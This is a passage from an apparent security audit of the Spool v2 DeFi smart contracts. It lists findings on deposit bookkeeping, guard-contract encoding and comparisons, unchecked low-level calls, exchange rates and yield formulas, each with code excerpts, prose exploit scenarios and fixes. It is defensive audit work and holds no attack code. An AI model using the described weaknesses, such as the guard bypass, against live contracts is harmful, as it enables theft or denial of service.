When depositing assets into a smart vault, users can decide whether to invoke the flushSmartVault function. A smart vault flush is a synchronization process that makes deposited funds available to be deployed into the strategies and makes withdrawn funds available to be withdrawn from the strategies. However, the internal bookkeeping of deposits keeps track of only the last deposit of the current flush cycle instead of the sum of all deposits (figure 9.1).

    function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2)
        external
        onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender)
        returns (uint256[] memory, uint256)
    {
        ...
        // transfer tokens from user to master wallet
        for (uint256 i; i < bag2.tokens.length; ++i) {
            _vaultDeposits[bag.smartVault][bag2.flushIndex][i] = bag.assets[i];
        }
        ...

Figure 9.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379–L439

The _vaultDeposits variable is then used to calculate the asset distribution in the flushSmartVault function.

    function flushSmartVault(
        address smartVault,
        uint256 flushIndex,
        address[] calldata strategies,
        uint16a16 allocation,
        address[] calldata tokens
    ) external returns (uint16a16) {
        _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender);
        if (_vaultDeposits[smartVault][flushIndex][0] == 0) {
            return uint16a16.wrap(0);
        }

        // handle deposits
        uint256[] memory exchangeRates = SpoolUtils.getExchangeRates(tokens, _priceFeedManager);
        _flushExchangeRates[smartVault][flushIndex].setValues(exchangeRates);

        uint256[][] memory distribution = distributeDeposit(
            DepositQueryBag1({
                deposit: _vaultDeposits[smartVault][flushIndex].toArray(tokens.length),
                exchangeRates: exchangeRates,
                allocation: allocation,
                strategyRatios: SpoolUtils.getStrategyRatiosAtLastDhw(strategies, _strategyRegistry)
            })
        );
        ...
        return _strategyRegistry.addDeposits(strategies, distribution);
    }

Figure 9.2: A snippet of the flushSmartVault function in spool-v2-core/DepositManager.sol#L188–L226

Lastly, the _strategyRegistry.addDeposits function is called with the computed distribution, which adds the amounts to deploy in the next doHardWork function call in the _assetsDeposited variable (figure 9.3).

    function addDeposits(address[] calldata strategies_, uint256[][] calldata amounts)
        external
        onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender)
        returns (uint16a16)
    {
        uint16a16 indexes;
        for (uint256 i; i < strategies_.length; ++i) {
            address strategy = strategies_[i];
            uint256 latestIndex = _currentIndexes[strategy];
            indexes = indexes.set(i, latestIndex);
            for (uint256 j = 0; j < amounts[i].length; j++) {
                _assetsDeposited[strategy][latestIndex][j] += amounts[i][j];
            }
        }
        return indexes;
    }

Figure 9.3: The addDeposits function in spool-v2-core/StrategyRegistry.sol#L343–L361

The next time the doHardWork function is called, it will transfer the equivalent of the last deposit's amount instead of the sum of all deposits from the master wallet to the assigned strategy (figure 9.4).

    function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused {
        ...
        // Transfer deposited assets to the strategy.
        for (uint256 k; k < assetGroup.length; ++k) {
            if (_assetsDeposited[strategy][dhwIndex][k] > 0) {
                _masterWallet.transfer(
                    IERC20(assetGroup[k]),
                    strategy,
                    _assetsDeposited[strategy][dhwIndex][k]
                );
            }
        }
        ...

Figure 9.4: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222–L341

Exploit Scenario
Bob deploys a smart vault. One hundred deposits are made before a smart vault flush is invoked, but only the last deposit's assets are deployed to the underlying strategies, severely impacting the smart vault's performance.

Recommendations
Short term, modify the depositAssets function so that it correctly tracks all deposits within a flush cycle, rather than just the last deposit.

Long term, improve the system's unit and integration tests: test a smart vault with a single strategy and multiple strategies to ensure that smart vaults behave correctly when funds are deposited and deployed to the underlying strategies.
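The short-term fix is a one-character change in the loop from figure 9.1, accumulating deposits instead of overwriting them:

    // Accumulate every deposit made during the current flush cycle instead of
    // overwriting the previous one.
    for (uint256 i; i < bag2.tokens.length; ++i) {
        _vaultDeposits[bag.smartVault][bag2.flushIndex][i] += bag.assets[i];
    }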
10. Risk of malformed calldata of calls to guard contracts
Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SPL-10
Target: managers/GuardManager.sol

Description
The GuardManager contract does not pad custom values while constructing the calldata for calls to guard contracts. The calldata could be malformed, causing the affected guard contract to give incorrect results or to always revert calls.

Guards for vaults are customizable checks that are executed on every user action. The result of a guard contract either approves or disapproves user actions. The GuardManager contract handles the logic to call guard contracts and to check their results (figure 10.1).

    function runGuards(address smartVaultId, RequestContext calldata context) external view {
        [...]
            bytes memory encoded = _encodeFunctionCall(smartVaultId, guard, context);
            (bool success, bytes memory data) = guard.contractAddress.staticcall(encoded);
            _checkResult(success, data, guard.operator, guard.expectedValue, i);
        }
    }

Figure 10.1: The runGuards function in spool-v2-core/GuardManager.sol#L19–L33

The arguments of the runGuards function include information related to the given user action and custom values defined at the time of guard definition. The GuardManager.setGuards function initializes the guards in the GuardManager contract. Using the guard definition, the GuardManager contract manually constructs the calldata with the selected values from the user action information and the custom values (figure 10.2).

    function _encodeFunctionCall(address smartVaultId, GuardDefinition memory guard, RequestContext memory context)
        internal
        pure
        returns (bytes memory)
    {
        [...]
        result = bytes.concat(result, methodID);
        for (uint256 i; i < paramsLength; ++i) {
            GuardParamType paramType = guard.methodParamTypes[i];
            if (paramType == GuardParamType.DynamicCustomValue) {
                result = bytes.concat(result, abi.encode(paramsEndLoc));
                paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length;
                customValueIdx++;
            } else if (paramType == GuardParamType.CustomValue) {
                result = bytes.concat(result, guard.methodParamValues[customValueIdx]);
                customValueIdx++;
            }
            [...]
        }

        customValueIdx = 0;
        for (uint256 i; i < paramsLength; ++i) {
            GuardParamType paramType = guard.methodParamTypes[i];
            if (paramType == GuardParamType.DynamicCustomValue) {
                result = bytes.concat(result, abi.encode(guard.methodParamValues[customValueIdx].length / 32));
                result = bytes.concat(result, guard.methodParamValues[customValueIdx]);
                customValueIdx++;
            } else if (paramType == GuardParamType.CustomValue) {
                customValueIdx++;
            }
            [...]
        }
        return result;
    }

Figure 10.2: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111–L177

However, the contract concatenates the custom values without considering their lengths and required padding. If these custom values are not properly padded at the time of guard initialization, the call will receive malformed data. As a result, either of the following could happen:
1. Every call to the guard contract will always fail, and user action transactions will always revert. The smart vault using the guard will become unusable.
2. The guard contract will receive incorrect arguments and return incorrect results. Invalid user actions could be approved, and valid user actions could be rejected.

Exploit Scenario
Bob deploys a smart vault and creates a guard for it. The guard contract takes only one custom value as an argument. Bob created the guard definition in GuardManager without padding the custom value. Alice tries to deposit into the smart vault, and the guard contract is called for her action. The call to the guard contract fails, and the transaction reverts. The smart vault is unusable.

Recommendations
Short term, modify the associated code so that it verifies that custom values are properly padded before guard definitions are initialized in GuardManager.setGuards.

Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. Additionally, improve the user documentation with necessary technical details to properly use the system.
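A sketch of a validation that GuardManager.setGuards could perform on each guard definition; the exact placement and revert message are illustrative:

    // Every custom value must be a whole number of 32-byte ABI words,
    // otherwise the manually built calldata will be misaligned.
    for (uint256 i; i < guard.methodParamValues.length; ++i) {
        if (guard.methodParamValues[i].length % 32 != 0) {
            revert("custom guard value not padded to 32 bytes");
        }
    }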
11. GuardManager does not account for all possible types when encoding guard arguments
Severity: Low Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-11
Target: managers/GuardManager.sol

Description
While encoding arguments for guard contracts, the GuardManager contract assumes that all static types are encoded to 32 bytes. This assumption does not hold for fixed-size static arrays and structs with only static type members. As a result, guard contracts could receive incorrect arguments, leading to unintended behavior.

The GuardManager._encodeFunctionCall function manually encodes arguments to call guard contracts (figure 11.1).

    function _encodeFunctionCall(address smartVaultId, GuardDefinition memory guard, RequestContext memory context)
        internal
        pure
        returns (bytes memory)
    {
        bytes4 methodID = bytes4(keccak256(abi.encodePacked(guard.methodSignature)));
        uint256 paramsLength = guard.methodParamTypes.length;
        bytes memory result = new bytes(0);
        result = bytes.concat(result, methodID);
        uint16 customValueIdx = 0;
        uint256 paramsEndLoc = paramsLength * 32;

        // Loop through parameters and
        // - store values for simple types
        // - store param value location for dynamic types
        for (uint256 i; i < paramsLength; ++i) {
            GuardParamType paramType = guard.methodParamTypes[i];
            if (paramType == GuardParamType.DynamicCustomValue) {
                result = bytes.concat(result, abi.encode(paramsEndLoc));
                paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length;
                customValueIdx++;
            } else if (paramType == GuardParamType.CustomValue) {
                result = bytes.concat(result, guard.methodParamValues[customValueIdx]);
                customValueIdx++;
            }
            [...]
            } else if (paramType == GuardParamType.Assets) {
                result = bytes.concat(result, abi.encode(paramsEndLoc));
                paramsEndLoc += 32 + context.assets.length * 32;
            } else if (paramType == GuardParamType.Tokens) {
                result = bytes.concat(result, abi.encode(paramsEndLoc));
                paramsEndLoc += 32 + context.tokens.length * 32;
            } else {
                revert InvalidGuardParamType(uint256(paramType));
            }
        }
        [...]
        return result;
    }

Figure 11.1: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111–L177

The function calculates the offset for dynamic type arguments assuming that every parameter, static or dynamic, takes exactly 32 bytes. However, fixed-length static type arrays and structs with only static type members are considered static. All static type values are encoded in-place, and static arrays and static structs could take more than 32 bytes. As a result, the calculated offset for the start of dynamic type arguments could be wrong, which would cause incorrect values for these arguments to be set, resulting in unintended behavior. For example, the guard could approve invalid user actions and reject valid user actions, or revert every call.

Exploit Scenario
Bob deploys a smart vault and creates a guard contract that takes the custom value of a fixed-length static array type. The guard contract uses RequestContext assets. Bob correctly creates the guard definition in GuardManager, but the GuardManager._encodeFunctionCall function incorrectly encodes the arguments. The guard contract fails to decode the arguments and always reverts the execution.

Recommendations
Short term, modify the GuardManager._encodeFunctionCall function so that it considers the encoding length of the individual parameters and calculates the offsets correctly.

Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly.
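The in-place encoding of static composite types is easy to confirm; this standalone helper (not from the Spool codebase) shows a fixed-size array of a static type occupying three 32-byte words:

    // A uint256[3] is a static type: abi.encode lays it out in-place as three
    // consecutive 32-byte words, with no offset or length prefix.
    function staticArrayEncodedSize() external pure returns (uint256) {
        uint256[3] memory arr = [uint256(1), 2, 3];
        return abi.encode(arr).length; // 96, not 32
    }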
12. Use of encoded values in guard contract comparisons could lead to opposite results
Severity: Low Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-12
Target: managers/GuardManager.sol

Description
The GuardManager contract compares the return value of a guard contract to an expected value. However, the contract uses encoded versions of these values in the comparison, which could lead to incorrect results for signed values with numerical comparison operators.

The GuardManager contract calls the guard contract and validates the return value using the GuardManager._checkResult function (figure 12.1).

    function _checkResult(bool success, bytes memory returnValue, bytes2 operator, bytes32 value, uint256 guardNum)
        internal
        pure
    {
        if (!success) revert GuardError();

        bool result = true;

        if (operator == bytes2("==")) {
            result = abi.decode(returnValue, (bytes32)) == value;
        } else if (operator == bytes2("<=")) {
            result = abi.decode(returnValue, (bytes32)) <= value;
        } else if (operator == bytes2(">=")) {
            result = abi.decode(returnValue, (bytes32)) >= value;
        } else if (operator == bytes2("<")) {
            result = abi.decode(returnValue, (bytes32)) < value;
        } else if (operator == bytes2(">")) {
            result = abi.decode(returnValue, (bytes32)) > value;
        } else {
            result = abi.decode(returnValue, (bool));
        }

        if (!result) revert GuardFailed(guardNum);
    }

Figure 12.1: The _checkResult function in spool-v2-core/GuardManager.sol#L80–L105

When a smart vault creator defines a guard using the GuardManager.setGuards function, they define a comparison operator and the expected value, which the GuardManager contract uses to compare with the return value of the guard contract. The comparison is performed on the first 32 bytes of the ABI-encoded return value and the expected value, which will cause issues depending on the return value type.

First, the numerical comparison operators (<, >, <=, >=) are not well defined for bytes32; therefore, the contract treats encoded values with padding as uint256 values before comparing them. This way of comparing values gives incorrect results for negative values of the int type.
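This standalone helper (not from the Spool codebase) demonstrates the paragraph above: reinterpreted as 32-byte words, a negative int256 compares as greater than a positive one:

    function negativeLooksLarger() external pure returns (bool) {
        // int256(-1) encodes as 32 0xff bytes (two's complement); viewed as an
        // unsigned 32-byte word it is the maximum possible value.
        bytes32 negOne = bytes32(uint256(int256(-1)));
        bytes32 one = bytes32(uint256(int256(1)));
        return negOne > one; // true, the opposite of the intended -1 > 1
    }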
The Solidity documentation includes the following description about the encoding of int type values: int: enc(X) is the big-endian two’s complement encoding of X, padded on the higher-order (left) side with 0xff bytes for negative X and with zero-bytes for non-negative X such that the length is 32 bytes. Figure 12.2: A description about the encoding of int type values in the Solidity documentation Because negative values are padded with 0xff and positive values with 0x00 , the encoded negative values will be considered greater than the encoded positive values. As a result, the result of the comparison will be the opposite of the expected result. Second, only the first 32 bytes of the return value are considered for comparison. This will lead to inaccurate results for return types that use more than 32 bytes to encode the value. Exploit Scenario Bob deploys a smart vault and intends to allow only users who own B NFTs to use it. B NFTs are implemented using ERC-1155. Bob uses the B contract as a guard with the comparison operator > and an expected value of 0 . Bob calls the function B.balanceOfBatch to fetch the NFT balance of the user. B.balanceOfBatch returns uint256[] . The first 32 bytes of the return data contain the offset into the return data, which is always nonzero. The comparison passes for every user regardless of whether they own a B NFT. As a result, every user can use Bob’s smart vault. Recommendations Short term, restrict the return value of a guard contract to a Boolean value. If that is not possible, document the limitations and risks surrounding the guard contracts. Additionally, consider manually checking new action guards with respect to these limitations. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. 13. Lack of contract existence checks on low-level calls Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SPL-13 Target: GuardManager.sol , Swapper.sol Description The GuardManager and Swapper contracts use low-level calls without contract existence checks. If the target address is incorrect or the contract at that address is destroyed, a low-level call will still return success. The Swapper.swap function uses the address().call(...) function to swap tokens (figure 13.1). function swap ( address [] calldata tokensIn, SwapInfo[] calldata swapInfo, address [] calldata tokensOut, address receiver ) external returns ( uint256 [] memory tokenAmounts) { // Perform the swaps. for ( uint256 i ; i < swapInfo.length; ++i) { if (!exchangeAllowlist[swapInfo[i].swapTarget]) { revert ExchangeNotAllowed(swapInfo[i].swapTarget); } _approveMax(IERC20(swapInfo[i].token), swapInfo[i].swapTarget); ( bool success , bytes memory data) = swapInfo[i].swapTarget.call(swapInfo[i].swapCallData); if (!success) revert (SpoolUtils.getRevertMsg(data)); } // Return unswapped tokens. for ( uint256 i ; i < tokensIn.length; ++i) { uint256 tokenInBalance = IERC20(tokensIn[i]).balanceOf( address ( this )); if (tokenInBalance > 0 ) { IERC20(tokensIn[i]).safeTransfer(receiver, tokenInBalance); } } Figure 13.1: The swap function in spool-v2-core/Swapper.sol#L29–L45 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. 
    Account existence must be checked prior to calling if needed.

Figure 13.2: The Solidity documentation details the necessity of executing existence checks before performing low-level calls.

Therefore, if the swapTarget address is incorrect or the target contract has been destroyed, the execution will not revert even if the swap is not successful. We rated this finding as only a low-severity issue because the Swapper contract transfers the unswapped tokens to the receiver if a swap is not successful.

However, the CompoundV2Strategy contract uses the Swapper contract to exchange COMP tokens for underlying tokens (figure 13.3).

    function _compound(
        address[] calldata tokens,
        SwapInfo[] calldata swapInfo,
        uint256[] calldata
    ) internal override returns (int256 compoundedYieldPercentage) {
        if (swapInfo.length > 0) {
            address[] memory markets = new address[](1);
            markets[0] = address(cToken);
            comptroller.claimComp(address(this), markets);

            uint256 compBalance = comp.balanceOf(address(this));
            if (compBalance > 0) {
                comp.safeTransfer(address(swapper), compBalance);
                address[] memory tokensIn = new address[](1);
                tokensIn[0] = address(comp);
                uint256 swappedAmount = swapper.swap(tokensIn, swapInfo, tokens, address(this))[0];

                if (swappedAmount > 0) {
                    uint256 cTokenBalanceBefore = cToken.balanceOf(address(this));
                    _depositToCompoundProtocol(IERC20(tokens[0]), swappedAmount);
                    uint256 cTokenAmountCompounded = cToken.balanceOf(address(this)) - cTokenBalanceBefore;

                    compoundedYieldPercentage = _calculateYieldPercentage(cTokenBalanceBefore, cTokenAmountCompounded);
                }
            }
        }
    }

Figure 13.3: The _compound function in spool-v2-core/CompoundV2Strategy.sol

If the swap operation fails, the COMP will stay in CompoundV2Strategy. This will cause users to lose the yield they would have gotten from compounding. Because the swap operation fails silently, the "do hard worker" may not notice that yield is not compounding. As a result, users will receive less in profit than they otherwise would have.

The GuardManager.runGuards function, which uses the address().staticcall() function, is also affected by this issue. However, the return value of the call is decoded, so the calls would not fail silently.

Exploit Scenario
The Spool team deploys CompoundV2Strategy with a market that gives COMP tokens to its users. While executing the doHardWork function for smart vaults using CompoundV2Strategy, the "do hard worker" sets the swapTarget address to an incorrect address. The swap operation to exchange COMP for the underlying token fails silently. The gained yield is not deposited into the market. The users receive less in profit.

Recommendations
Short term, implement a contract existence check before the low-level calls in GuardManager.runGuards and Swapper.swap.

Long term, avoid implementing low-level calls. If such calls are unavoidable, carefully review the Solidity documentation, particularly the "Warnings" section, before implementing them to ensure that they are implemented correctly.
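As an illustration of the short-term recommendation, a minimal sketch (ours; the helper name and revert messages are assumptions) of a guarded low-level call:

    // Sketch (not from the codebase): reject calls to addresses with no code.
    abstract contract ExistenceCheckedCaller {
        // extcodesize is zero for EOAs and for destroyed contracts, so a plain
        // low-level call to such an address returns success without executing
        // anything.
        function _callWithExistenceCheck(address target, bytes memory data)
            internal
            returns (bytes memory)
        {
            if (target.code.length == 0) revert("target is not a contract");
            (bool success, bytes memory ret) = target.call(data);
            if (!success) revert("call failed");
            return ret;
        }
    }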
14. Incorrect use of exchangeRates in doHardWork

Severity: High                        Difficulty: Low
Type: Undefined Behavior              Finding ID: TOB-SPL-14
Target: managers/StrategyRegistry.sol

Description
The StrategyRegistry contract's doHardWork function fetches the exchangeRates for all of the tokens involved in the "do hard work" process, and then it iterates over the strategies and saves the exchangeRates values for the current strategy's tokens in the assetGroupExchangeRates variable; however, when doHardWork is called for a strategy, the exchangeRates variable rather than the assetGroupExchangeRates variable is passed, resulting in the use of incorrect exchange rates.

    function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused {
        ...
        // Get exchange rates for tokens and validate them against slippages.
        uint256[] memory exchangeRates = SpoolUtils.getExchangeRates(dhwParams.tokens, _priceFeedManager);
        for (uint256 i; i < dhwParams.tokens.length; ++i) {
            if (
                exchangeRates[i] < dhwParams.exchangeRateSlippages[i][0]
                    || exchangeRates[i] > dhwParams.exchangeRateSlippages[i][1]
            ) {
                revert ExchangeRateOutOfSlippages();
            }
        }
        ...
        // Get exchange rates for this group of strategies.
        uint256 assetGroupId = IStrategy(dhwParams.strategies[i][0]).assetGroupId();
        address[] memory assetGroup = IStrategy(dhwParams.strategies[i][0]).assets();
        uint256[] memory assetGroupExchangeRates = new uint256[](assetGroup.length);

        for (uint256 j; j < assetGroup.length; ++j) {
            bool found = false;

            for (uint256 k; k < dhwParams.tokens.length; ++k) {
                if (assetGroup[j] == dhwParams.tokens[k]) {
                    assetGroupExchangeRates[j] = exchangeRates[k];
                    found = true;
                    break;
                }
            }
        ...
        // Do the hard work on the strategy.
        DhwInfo memory dhwInfo = IStrategy(strategy).doHardWork(
            StrategyDhwParameterBag({
                swapInfo: dhwParams.swapInfo[i][j],
                compoundSwapInfo: dhwParams.compoundSwapInfo[i][j],
                slippages: dhwParams.strategySlippages[i][j],
                assetGroup: assetGroup,
                exchangeRates: exchangeRates,
                withdrawnShares: _sharesRedeemed[strategy][dhwIndex],
                masterWallet: address(_masterWallet),
                priceFeedManager: _priceFeedManager,
                baseYield: dhwParams.baseYields[i][j],
                platformFees: platformFeesMemory
            })
        );

        // Bookkeeping.
        _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio();
        _exchangeRates[strategy][dhwIndex].setValues(exchangeRates);
        ...

Figure 14.1: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222–L341

The exchangeRates values are used by a strategy's doHardWork function to calculate how many assets in USD value are to be deposited and how many in USD value are currently deposited in the strategy. As a consequence of using exchangeRates rather than assetGroupExchangeRates, the contract will return incorrect values. Additionally, the _exchangeRates variable is returned by the strategyAtIndexBatch function, which is used when simulating deposits.

Exploit Scenario
Bob deploys a smart vault, and users start depositing into it. However, the first time doHardWork is called, they notice that the deposited assets and the reported USD value deposited into the strategies are incorrect. They panic and start withdrawing all of the funds.

Recommendations
Short term, replace exchangeRates with assetGroupExchangeRates in the relevant areas of doHardWork and where it sets the _exchangeRates variable.

Long term, improve the system's unit and integration tests to verify that the deposited value in a strategy is the expected amount. Additionally, when reviewing the code, look for local variables that are set but then never used; this is a warning sign that problems may arise.
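For reference, a minimal sketch (ours; names taken from figure 14.1) of the remapping that the per-group rates perform. The global exchangeRates array is indexed by dhwParams.tokens, while a strategy indexes the rates it receives by its asset group's own token positions, which is why the remapped array is the one that should be passed on:

    // Sketch (not from the codebase): remap global token rates to the
    // positions of an asset group, as the inner loop of figure 14.1 does.
    library AssetGroupRates {
        function remap(
            address[] memory assetGroup,
            address[] memory tokens,
            uint256[] memory exchangeRates
        ) internal pure returns (uint256[] memory assetGroupExchangeRates) {
            assetGroupExchangeRates = new uint256[](assetGroup.length);
            for (uint256 j; j < assetGroup.length; ++j) {
                for (uint256 k; k < tokens.length; ++k) {
                    if (assetGroup[j] == tokens[k]) {
                        // Rate for the group's j-th asset, not for token index j.
                        assetGroupExchangeRates[j] = exchangeRates[k];
                        break;
                    }
                }
            }
        }
    }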
15. LinearAllocationProvider could return an incorrect result

Severity: Medium                      Difficulty: Medium
Type: Undefined Behavior              Finding ID: TOB-SPL-15
Target: providers/LinearAllocationProvider.sol

Description
The LinearAllocationProvider contract returns an incorrect result when the given smart vault has a riskTolerance value of -8 due to an incorrect literal value in the riskArray variable.

    function calculateAllocation(AllocationCalculationInput calldata data)
        external
        pure
        returns (uint256[] memory)
    {
        ...
        uint24[21] memory riskArray = [
            100000,
            95000,
            900000,
            ...
        ];
        ...
        uint8 riskt = uint8(data.riskTolerance + 10); // from 0 to 20

        for (uint8 i; i < data.apys.length; ++i) {
            ...
            results[i] = apy * riskArray[uint8(20 - riskt)] + risk * riskArray[uint8(riskt)];
            resSum += results[i];
        }

        uint256 resSum2;
        for (uint8 i; i < results.length; ++i) {
            results[i] = FULL_PERCENT * results[i] / resSum;
            resSum2 += results[i];
        }
        results[0] += FULL_PERCENT - resSum2;

        return results;

Figure 15.1: A snippet of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L9–L67

The riskArray's third element is incorrect: it should be 90000 rather than 900000. This affects the computed allocation for smart vaults that have a riskTolerance value of -8, because the riskt variable would be 2, which is later used as an index into riskArray. The subexpression risk * riskArray[uint8(riskt)] is therefore incorrect by a factor of 10.

Exploit Scenario
Bob deploys a smart vault with a riskTolerance value of -8 and an empty strategyAllocation value. The allocation between the strategies is computed on the spot using the LinearAllocationProvider contract, but the allocation is wrong.

Recommendations
Short term, replace 900000 with 90000 in the calculateAllocation function.

Long term, improve the system's unit and integration tests to catch issues such as this. Document the use and meaning of constants such as the values in riskArray. This will make it more likely that the Spool team will find these types of mistakes.
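A minimal sketch (ours) of the index computation shows why only a riskTolerance of -8 reaches the mistyped element:

    // Sketch (not from the codebase): riskTolerance in [-10, 10] maps to a
    // riskArray index in [0, 20]; only -8 maps to index 2, the element that
    // holds 900000 instead of 90000.
    function riskArrayIndex(int8 riskTolerance) pure returns (uint8) {
        return uint8(riskTolerance + 10); // -8 + 10 == 2
    }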
16. Incorrect formula used for adding/subtracting two yields

Severity: Medium                      Difficulty: Low
Type: Undefined Behavior              Finding ID: TOB-SPL-16
Target: manager/StrategyRegistry.sol, strategies/Strategy.sol

Description
The doHardWork function adds two yields with different base values to compute the given strategy's total yield, which results in the collection of fewer ecosystem fees and treasury fees.

It is incorrect to add two yields that have different base values. The correct formula to compute the total yield from two consecutive yields Y1 and Y2 is Y1 + Y2 + (Y1 * Y2).

The doHardWork function in the Strategy contract adds the protocol yield and the rewards yield to calculate the given strategy's total yield. The protocol yield percentage is calculated with the base value of the strategy's total assets at the start of the current "do hard work" cycle, while the rewards yield percentage is calculated with the base value of the total assets currently owned by the strategy.

    dhwInfo.yieldPercentage = _getYieldPercentage(dhwParams.baseYield);
    dhwInfo.yieldPercentage += _compound(dhwParams.assetGroup, dhwParams.compoundSwapInfo, dhwParams.slippages);

Figure 16.1: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L95–L96

Therefore, the total yield of the strategy is computed as less than its actual yield, and the use of this value to compute fees results in the collection of fewer fees for the platform's governance system.

The same issue also affects the computation of the total yield of a strategy on every "do hard work" cycle:

    _stateAtDhw[strategy][dhwIndex] = StateAtDhwIndex({
        sharesMinted: uint128(dhwInfo.sharesMinted),
        totalStrategyValue: uint128(dhwInfo.valueAtDhw),
        totalSSTs: uint128(dhwInfo.totalSstsAtDhw),
        yield: int96(dhwInfo.yieldPercentage) + _stateAtDhw[strategy][dhwIndex - 1].yield, // accumulate the yield from before
        timestamp: uint32(block.timestamp)
    });

Figure 16.2: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L331–L337

This value of the total yield of a strategy is used to calculate the management fees for a given smart vault, which results in fewer fees paid to the smart vault owner.

Exploit Scenario
The Spool team deploys the system. Alice deposits 1,000 tokens into a vault, which mints 1,000 strategy share tokens for the vault. On the next "do hard work" execution, the tokens earn 8% yield and 30 reward tokens from the protocol. The 30 reward tokens are then exchanged for 20 deposit tokens. At this point, the total tokens earned by the strategy are 100 (80 from the base yield plus 20 from the rewards), and the total yield is 10%. However, the doHardWork function measures the rewards yield against the post-yield balance of 1,080 tokens (20 / 1,080 ≈ 1.85%) and adds it to the 8% base yield, computing the total yield as 9.85%, which is incorrect and results in fewer fees collected for the platform.

Recommendations
Short term, use the correct formula to calculate a given strategy's total yield in both the Strategy contract and the StrategyRegistry contract. Note that the syncDepositsSimulate function subtracts a strategy's total yield at different "do hard work" indexes in DepositManager.sol#L322–L326 to compute the difference between the strategy's yields between two "do hard work" cycles. After fixing this issue, this function's computation will be incorrect.

Long term, review the entire codebase to find all of the mathematical formulas used. Document these formulas, their assumptions, and their derivations to avoid the use of incorrect formulas.
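A minimal sketch (ours; the YIELD_FULL_PERCENT fixed-point convention is an assumption for illustration) of the correct composition:

    // Sketch (not from the codebase): composing two consecutive yields that
    // were measured against different bases. Yields are fixed-point fractions
    // in which YIELD_FULL_PERCENT represents 100% (assumed convention).
    int256 constant YIELD_FULL_PERCENT = 1e12;

    function composeYields(int256 y1, int256 y2) pure returns (int256) {
        // Correct: Y1 + Y2 + Y1*Y2; plain addition understates the total.
        // Example from the scenario above: 8% composed with 20/1080 ≈ 1.852%
        // yields exactly 10%.
        return y1 + y2 + (y1 * y2) / YIELD_FULL_PERCENT;
    }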
17. Smart vaults with re-registered strategies will not be usable

Severity: Low                         Difficulty: High
Type: Undefined Behavior              Finding ID: TOB-SPL-17
Target: manager/StrategyRegistry.sol

Description
The StrategyRegistry contract does not clear the state related to a strategy when removing it. As a result, if the removed strategy is registered again, the StrategyRegistry contract will still contain the strategy's previous state, resulting in a temporary DoS of the smart vaults using it.

The StrategyRegistry.registerStrategy function is used to register a strategy and to initialize the state related to it (figure 17.1). StrategyRegistry tracks the state of the strategies by their address.

    function registerStrategy(address strategy) external {
        _checkRole(ROLE_SPOOL_ADMIN, msg.sender);
        if (_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert StrategyAlreadyRegistered({address_: strategy});

        _accessControl.grantRole(ROLE_STRATEGY, strategy);
        _currentIndexes[strategy] = 1;
        _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio();
        _stateAtDhw[address(strategy)][0].timestamp = uint32(block.timestamp);
    }

Figure 17.1: The registerStrategy function in spool-v2-core/StrategyRegistry.sol

The StrategyRegistry._removeStrategy function is used to remove a strategy by revoking its ROLE_STRATEGY role.

    function _removeStrategy(address strategy) private {
        if (!_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert InvalidStrategy({address_: strategy});

        _accessControl.revokeRole(ROLE_STRATEGY, strategy);
    }

Figure 17.2: The _removeStrategy function in spool-v2-core/StrategyRegistry.sol

While removing a strategy, the StrategyRegistry contract does not remove the state related to that strategy. As a result, when that strategy is registered again, StrategyRegistry will contain values from the previous period. This could make the smart vaults using the strategy unusable or cause the unintended transfer of assets between other strategies and this strategy.

Exploit Scenario
Strategy S is registered. StrategyRegistry._currentIndexes[S] is equal to 1. Alice creates a smart vault X that uses strategy S. Bob deposits 1 million WETH into smart vault X. StrategyRegistry._assetsDeposited[S][1][WETH] is equal to 1 million WETH. The doHardWork function is called for strategy S. WETH is transferred from the master wallet to strategy S and is deposited into the protocol.

A Spool system admin removes strategy S upon hearing that the protocol is being exploited. However, the admin realizes that the protocol is not being exploited and re-registers strategy S. StrategyRegistry._currentIndexes[S] is set to 1. StrategyRegistry._assetsDeposited[S][1][WETH] is not set to zero and is still equal to 1 million WETH. Alice creates a new vault with strategy S. When doHardWork is called for strategy S, StrategyRegistry tries to transfer 1 million WETH to the strategy. The master wallet does not have those assets, so doHardWork fails for strategy S. The smart vault becomes unusable.

Recommendations
Short term, modify the StrategyRegistry._removeStrategy function so that it clears states related to removed strategies if re-registering strategies is an intended use case. If this is not an intended use case, modify the StrategyRegistry.registerStrategy function so that it verifies that newly registered strategies have not been previously registered.

Long term, properly document all intended use cases of the system and implement comprehensive tests to ensure that the system behaves as expected.
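If re-registration is not an intended use case, a minimal sketch (ours; the StrategyPreviouslyRegistered error is an assumed addition, and the function body otherwise mirrors figure 17.1) of the check in registerStrategy:

    // Sketch (not from the codebase): reject strategies that were registered
    // before, using the nonzero _currentIndexes entry they leave behind.
    error StrategyPreviouslyRegistered(address address_);

    function registerStrategy(address strategy) external {
        _checkRole(ROLE_SPOOL_ADMIN, msg.sender);
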